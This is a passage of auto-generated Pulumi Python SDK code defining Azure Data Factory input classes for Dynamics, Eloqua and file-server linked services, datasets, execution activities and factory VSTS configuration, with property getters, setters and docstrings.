parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Dynamics entity dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param Any entity_name: The logical name of the entity. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'DynamicsEntity')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if entity_name is not None:
pulumi.set(__self__, "entity_name", entity_name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="entityName")
def entity_name(self) -> Optional[Any]:
"""
The logical name of the entity. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "entity_name")
@entity_name.setter
def entity_name(self, value: Optional[Any]):
pulumi.set(self, "entity_name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class DynamicsLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
deployment_type: pulumi.Input[str],
type: pulumi.Input[str],
username: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
host_name: Optional[Any] = None,
organization_name: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
service_uri: Optional[Any] = None):
"""
Dynamics linked service.
        :param pulumi.Input[str] authentication_type: The authentication type to connect to the Dynamics server: 'Office365' for the online scenario, 'Ifd' for the on-premises-with-Ifd scenario. Type: string (or Expression with resultType string).
:param pulumi.Input[str] deployment_type: The deployment type of the Dynamics instance. 'Online' for Dynamics Online and 'OnPremisesWithIfd' for Dynamics on-premises with Ifd. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param Any username: User name to access the Dynamics instance. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any host_name: The host name of the on-premises Dynamics server. The property is required for on-prem and not allowed for online. Type: string (or Expression with resultType string).
:param Any organization_name: The organization name of the Dynamics instance. The property is required for on-prem, and required for online when more than one Dynamics instance is associated with the user. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to access the Dynamics instance.
:param Any port: The port of the on-premises Dynamics server. The property is required for on-prem and not allowed for online. Default is 443. Type: integer (or Expression with resultType integer), minimum: 0.
:param Any service_uri: The URL to the Microsoft Dynamics server. The property is required for online and not allowed for on-prem. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "deployment_type", deployment_type)
pulumi.set(__self__, "type", 'Dynamics')
pulumi.set(__self__, "username", username)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if host_name is not None:
pulumi.set(__self__, "host_name", host_name)
if organization_name is not None:
pulumi.set(__self__, "organization_name", organization_name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if service_uri is not None:
pulumi.set(__self__, "service_uri", service_uri)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication type to connect to the Dynamics server. 'Office365' for the online scenario, 'Ifd' for the on-premises with Ifd scenario. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Input[str]:
"""
The deployment type of the Dynamics instance. 'Online' for Dynamics Online and 'OnPremisesWithIfd' for Dynamics on-premises with Ifd. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deployment_type")
@deployment_type.setter
def deployment_type(self, value: pulumi.Input[str]):
pulumi.set(self, "deployment_type", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def username(self) -> Any:
"""
User name to access the Dynamics instance. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Any):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="hostName")
def host_name(self) -> Optional[Any]:
"""
The host name of the on-premises Dynamics server. The property is required for on-prem and not allowed for online. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host_name")
@host_name.setter
def host_name(self, value: Optional[Any]):
pulumi.set(self, "host_name", value)
@property
@pulumi.getter(name="organizationName")
def organization_name(self) -> Optional[Any]:
"""
The organization name of the Dynamics instance. The property is required for on-prem, and required for online when more than one Dynamics instance is associated with the user. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "organization_name")
@organization_name.setter
def organization_name(self, value: Optional[Any]):
pulumi.set(self, "organization_name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to access the Dynamics instance.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The port of the on-premises Dynamics server. The property is required for on-prem and not allowed for online. Default is 443. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="serviceUri")
def service_uri(self) -> Optional[Any]:
"""
The URL to the Microsoft Dynamics server. The property is required for online and not allowed for on-prem. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_uri")
@service_uri.setter
def service_uri(self, value: Optional[Any]):
pulumi.set(self, "service_uri", value)
@pulumi.input_type
class EloquaLinkedServiceArgs:
def __init__(__self__, *,
endpoint: Any,
type: pulumi.Input[str],
username: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Eloqua server linked service.
:param Any endpoint: The endpoint of the Eloqua server (e.g. eloqua.example.com).
:param pulumi.Input[str] type: Type of linked service.
:param Any username: The site name and user name of your Eloqua account in the form sitename/username (e.g. Eloqua/Alice).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'Eloqua')
pulumi.set(__self__, "username", username)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the Eloqua server (e.g. eloqua.example.com).
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def username(self) -> Any:
"""
The site name and user name of your Eloqua account in the form sitename/username (e.g. Eloqua/Alice).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Any):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class EloquaObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Eloqua server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'EloquaObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class EntityReferenceArgs:
def __init__(__self__, *,
reference_name: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
The entity reference.
:param pulumi.Input[str] reference_name: The name of this referenced entity.
:param pulumi.Input[str] type: The type of this referenced entity.
"""
if reference_name is not None:
pulumi.set(__self__, "reference_name", reference_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of this referenced entity.
"""
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of this referenced entity.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ExecutionActivityArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
type: pulumi.Input[str],
depends_on: Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]] = None,
description: Optional[pulumi.Input[str]] = None,
linked_service_name: Optional[pulumi.Input['LinkedServiceReferenceArgs']] = None,
policy: Optional[pulumi.Input['ActivityPolicyArgs']] = None):
"""
Base class for all execution activities.
:param pulumi.Input[str] name: Activity name.
:param pulumi.Input[str] type: Type of activity.
:param pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]] depends_on: Activity depends on condition.
:param pulumi.Input[str] description: Activity description.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input['ActivityPolicyArgs'] policy: Activity policy.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", 'Execution')
if depends_on is not None:
pulumi.set(__self__, "depends_on", depends_on)
if description is not None:
pulumi.set(__self__, "description", description)
if linked_service_name is not None:
pulumi.set(__self__, "linked_service_name", linked_service_name)
if policy is not None:
pulumi.set(__self__, "policy", policy)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Activity name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of activity.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="dependsOn")
def depends_on(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]]:
"""
Activity depends on condition.
"""
return pulumi.get(self, "depends_on")
@depends_on.setter
def depends_on(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]]):
pulumi.set(self, "depends_on", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Activity description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> Optional[pulumi.Input['LinkedServiceReferenceArgs']]:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: Optional[pulumi.Input['LinkedServiceReferenceArgs']]):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def policy(self) -> Optional[pulumi.Input['ActivityPolicyArgs']]:
"""
Activity policy.
"""
return pulumi.get(self, "policy")
@policy.setter
def policy(self, value: Optional[pulumi.Input['ActivityPolicyArgs']]):
pulumi.set(self, "policy", value)
@pulumi.input_type
class FactoryIdentityArgs:
def __init__(__self__, *,
type: pulumi.Input[str]):
"""
Identity properties of the factory resource.
:param pulumi.Input[str] type: The identity type. Currently the only supported type is 'SystemAssigned'.
"""
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The identity type. Currently the only supported type is 'SystemAssigned'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class FactoryVSTSConfigurationArgs:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
collaboration_branch: Optional[pulumi.Input[str]] = None,
last_commit_id: Optional[pulumi.Input[str]] = None,
project_name: Optional[pulumi.Input[str]] = None,
repository_name: Optional[pulumi.Input[str]] = None,
root_folder: Optional[pulumi.Input[str]] = None,
tenant_id: Optional[pulumi.Input[str]] = None):
"""
Factory's VSTS repo information.
:param pulumi.Input[str] account_name: VSTS account name.
:param pulumi.Input[str] collaboration_branch: VSTS collaboration branch.
:param pulumi.Input[str] last_commit_id: VSTS last commit id.
:param pulumi.Input[str] project_name: VSTS project name.
:param pulumi.Input[str] repository_name: VSTS repository name.
:param pulumi.Input[str] root_folder: VSTS root folder.
:param pulumi.Input[str] tenant_id: VSTS tenant id.
"""
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if collaboration_branch is not None:
pulumi.set(__self__, "collaboration_branch", collaboration_branch)
if last_commit_id is not None:
pulumi.set(__self__, "last_commit_id", last_commit_id)
if project_name is not None:
pulumi.set(__self__, "project_name", project_name)
if repository_name is not None:
pulumi.set(__self__, "repository_name", repository_name)
if root_folder is not None:
pulumi.set(__self__, "root_folder", root_folder)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
"""
VSTS account name.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="collaborationBranch")
def collaboration_branch(self) -> Optional[pulumi.Input[str]]:
"""
VSTS collaboration branch.
"""
return pulumi.get(self, "collaboration_branch")
@collaboration_branch.setter
def collaboration_branch(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "collaboration_branch", value)
@property
@pulumi.getter(name="lastCommitId")
def last_commit_id(self) -> Optional[pulumi.Input[str]]:
"""
VSTS last commit id.
"""
return pulumi.get(self, "last_commit_id")
@last_commit_id.setter
def last_commit_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_commit_id", value)
@property
@pulumi.getter(name="projectName")
def project_name(self) -> Optional[pulumi.Input[str]]:
"""
VSTS project name.
"""
return pulumi.get(self, "project_name")
@project_name.setter
def project_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_name", value)
@property
@pulumi.getter(name="repositoryName")
def repository_name(self) -> Optional[pulumi.Input[str]]:
"""
VSTS repository name.
"""
return pulumi.get(self, "repository_name")
@repository_name.setter
def repository_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repository_name", value)
@property
@pulumi.getter(name="rootFolder")
def root_folder(self) -> Optional[pulumi.Input[str]]:
"""
VSTS root folder.
"""
return pulumi.get(self, "root_folder")
@root_folder.setter
def root_folder(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "root_folder", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
VSTS tenant id.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@pulumi.input_type
class FileServerLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_id: Optional[Any] = None):
"""
File system linked service.
:param Any host: Host name of the server. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to log on to the server.
:param Any user_id: User ID used to log on to the server. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'FileServer')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter
def host(self) -> Any:
"""
Host name of the server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
